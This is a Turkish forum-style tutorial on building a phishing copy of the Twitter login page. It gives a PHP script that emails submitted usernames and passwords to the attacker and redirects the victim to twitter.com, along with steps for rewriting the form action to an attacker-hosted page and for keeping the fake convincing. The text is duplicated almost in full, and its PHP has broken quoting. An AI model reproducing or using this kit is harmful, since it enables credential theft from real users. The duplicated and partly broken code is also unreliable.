En büyük sebebi kurbanımız fake sayfamıza giriş yapıp onayladığında
kurbana uyarı kutucuğu çıkıyor ve aşırı bir inandırıcılık zaafiyeti oluşuyor.
Zaten post adresi sadece verileri maile göndermeye yarıyor başka bi esprisi yok.
--------------------------------------------------------------------------------
Fake yapımını herkez biliyordur ama bi kez daha hatırlatmakta fayda görüyorum
1) sayfa kaynak kodlarını koplayıp kaydediyoruz
2) sayfa içinde ( form method veya form action ) kodlarını buluyoruz
3) Bu alanı post adresimize yönlendiriyoruz
Bunu Twitter için örnekleyelim örnek üzerinde daha iyi anlaşılır.
1) Bizim yapacağımız işlemde ise post adresi yerine bi php sayfası koyarak bu işi halletmek
öncelikle bi metin belgesi açıyoruz ve
PHP- Kodu:
<?php
$kime="mail adresiniz";
$baslik="Twiter Sifreleri";
$yonlendir="http://twitter.com/";
$Crim="UserName : ".$_POST[’User1]."\\r\\n"."şifre : ".$_POST[pass1]."\\r\\n";
echo ’**********window.********.href = " . $yonlendir . ";</script>;
mail($kime, $baslik, $Crim)
?>
Bu kodları yapıstırıp .php uzantıyla kaydediyorsunuz
2) Twitterin kaynak kodlarını indiriyoruz ve kodları bir txt editör ile açıyoruz
3) ctrl-f tuşlarına basarak arama çubuğundan ( form action veya form method ) u buluyoruz.
twitterde form action var bunu kullanacağız.
4) Şimdi buradaki bilgileri gönderdiği yeri silerek buraya gönder.php adlı sayfamızın adresini yazıyoruz
örn= PHP- Kodu:
<form action="http://www.frukocuk.com/gonder.php" class="signup signup-btn" method="post">
gibi
5) 4. aşamayı yapabilmek için gonder.php yi ftp sunucumuza göndermemiz gerekmektedir.
Not: bu işlemleri yaptığımızda sayfanın karakter yapısı bozulmaktadır yani türkçe karakterler bozuk çıkmaktadır
bu olayı göz ardı etmeyip inandırıcılığı kaybetmemek için onları elinizde düzeltmeniz gerekecektir.
kurbana uyarı kutucuğu çıkıyor ve aşırı bir inandırıcılık zaafiyeti oluşuyor.
Zaten post adresi sadece verileri maile göndermeye yarıyor başka bi esprisi yok.
--------------------------------------------------------------------------------
Fake yapımını herkez biliyordur ama bi kez daha hatırlatmakta fayda görüyorum
1) sayfa kaynak kodlarını koplayıp kaydediyoruz
2) sayfa içinde ( form method veya form action ) kodlarını buluyoruz
3) Bu alanı post adresimize yönlendiriyoruz
Bunu Twitter için örnekleyelim örnek üzerinde daha iyi anlaşılır.
1) Bizim yapacağımız işlemde ise post adresi yerine bi php sayfası koyarak bu işi halletmek
öncelikle bi metin belgesi açıyoruz ve
PHP- Kodu:
<?php
$kime="mail adresiniz";
$baslik="Twiter Sifreleri";
$yonlendir="http://twitter.com/";
$Crim="UserName : ".$_POST[’User1]."\\r\\n"."şifre : ".$_POST[pass1]."\\r\\n";
echo ’**********window.********.href = " . $yonlendir . ";</script>;
mail($kime, $baslik, $Crim)
?>
Bu kodları yapıstırıp .php uzantıyla kaydediyorsunuz
2) Twitterin kaynak kodlarını indiriyoruz ve kodları bir txt editör ile açıyoruz
3) ctrl-f tuşlarına basarak arama çubuğundan ( form action veya form method ) u buluyoruz.
twitterde form action var bunu kullanacağız.
4) Şimdi buradaki bilgileri gönderdiği yeri silerek buraya gönder.php adlı sayfamızın adresini yazıyoruz
örn= PHP- Kodu:
<form action="http://www.frukocuk.com/gonder.php" class="signup signup-btn" method="post">
gibi
5) 4. aşamayı yapabilmek için gonder.php yi ftp sunucumuza göndermemiz gerekmektedir.
Not: bu işlemleri yaptığımızda sayfanın karakter yapısı bozulmaktadır yani türkçe karakterler bozuk çıkmaktadır
bu olayı göz ardı etmeyip inandırıcılığı kaybetmemek için onları elinizde düzeltmeniz gerekecektir.
